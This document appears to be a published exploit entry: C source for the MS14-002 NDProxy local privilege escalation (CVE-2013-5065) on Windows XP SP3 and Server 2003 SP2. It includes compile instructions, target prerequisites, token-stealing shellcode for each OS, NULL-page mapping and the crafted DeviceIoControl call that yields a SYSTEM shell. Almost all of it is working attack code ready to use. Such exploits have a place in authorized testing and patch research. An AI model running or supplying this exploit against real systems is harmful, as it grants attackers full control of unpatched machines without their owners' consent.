Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)

/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
#   Windows XP SP3 x86
#   Windows XP SP2 x86-64
#   Windows 2003 SP2 x86
#   Windows 2003 SP2 x86-64
#   Windows 2003 SP2 IA-64
# Supported vulnerable software:
#   Windows XP SP3 x86
#   Windows 2003 SP2 x86
# Tested on:
#   Windows XP SP3 x86 EN
#   Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
#   NDPROXY is a system-provided driver that interfaces WAN
#   miniport drivers, call managers, and miniport call managers
#   to the Telephony Application Programming Interfaces (TAPI)
#   services.
#   The vulnerability is caused when the NDProxy.sys kernel
#   component fails to properly validate input.
#   An attacker who successfully exploited this vulnerability
#   could run arbitrary code in kernel mode (i.e. with SYSTEM
#   privileges).
################################################################
# Exploit notes:
#   Privileged shell execution:
#     - the SYSTEM shell will spawn within the existing shell
#       (i.e. exploit usable via a remote shell)
#   Exploit compiling:
#     - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
#   Exploit prerequisites:
#     - low privilege access to the target (remote shell or RDP)
#     - target not patched (KB2914368 not installed)
#     - service "Routing and Remote Access" running on the target
#       - "Power User" user group can start and stop services
#         - > sc query remoteaccess
#         - > sc start remoteaccess
################################################################
# Thanks to:
#   Andy (C PoC - Win XP SP3)
#   ryujin (Python PoC - Win XP SP3)
################################################################
# References:
#   http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
#   https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
#   https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
#   https://www.exploit-db.com/exploits/30014/
#   https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
#   https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
#   https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
#   https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>



typedef struct {
    PVOID   Unknown1;
    PVOID   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT  Index;
    USHORT  NameLength;
    USHORT  LoadCount;
    USHORT  PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;


typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;


typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;


typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
         PVOID SystemInformation,
         ULONG SystemInformationLength,
         PULONG ReturnLength);



static VOID InitFirstPage (void)
{
    PVOID BaseAddress;
    ULONG RegionSize;
    NTSTATUS ReturnCode;
    FARPROC NtAllocateVirtualMemory;

    NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");

    fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
    RegionSize = 0xf000;
    BaseAddress = (PVOID) 0x00000001;
    ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
                                         &BaseAddress,
	                                     0,
                                         &RegionSize,
                                         MEM_COMMIT | MEM_RESERVE,
                                         PAGE_EXECUTE_READWRITE);
    if (ReturnCode != 0)
    {
         fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
         fprintf (stderr, "    Error code: %#X\n", ReturnCode);
         fflush (stderr);
         ExitProcess (1);
    }
    fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
    FillMemory (BaseAddress, RegionSize, 0x41);
    return;
}



int exploit (unsigned char *shellcode)
{
    DWORD writtenBytes;
    int returnValue;

    InitFirstPage ();

    unsigned char *shellcodeBuffer;
    shellcodeBuffer = (char *) malloc (400);
    memset (shellcodeBuffer, (int) "xCC", 400);
    memcpy (shellcodeBuffer, shellcode, 112);

    returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
    if (returnValue == 0)
    {
        printf ("[-] Attempt to map memory_write failed\n");
        printf ("    Error code: %d\n", GetLastError ());
        exit(1);
    }
    HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
    {
        printf ("[-] Creating a device handle on NDProxy failed\n");
        printf ("    Error code: %d\n", GetLastError());
        exit (0);
    }
    DWORD inputBuffer [0x15] = {0};
    DWORD returnedBytes = 0;
    *(inputBuffer + 5) = 0x7030125;
    *(inputBuffer + 7) = 0x34;
    DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
    CloseHandle (ndProxyDeviceHandle);
    system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
    return 0;
}



int main (int argc, char **argv)
{
    if (argc != 2)
    {
        printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
        printf ("           supported OS_TYPE:\n");
        printf ("                  XP  - Windows XP SP3 x86\n");
        printf ("                  2k3 - Windows 2003 SP2 x86\n");
        printf ("[*] Note:  the service \"Routing and Remote Access\"\n");
        printf ("           must be running on the target machine\n");
        exit (0);
    }
    else
    {
        if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
        {
            unsigned char shellcodeXP[] =
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
            "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
            "\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
            "\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
            exploit (shellcodeXP);
        }
        else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
        {
            unsigned char shellcode2k3[] =
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
            "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
            "\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
            "\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
            exploit (shellcode2k3);
        }
        else
        {
            printf ("[-] Invalid argument\n");
            printf ("    Argument used: %s\n", argv[1]);
            exit(0);
        }
    }
}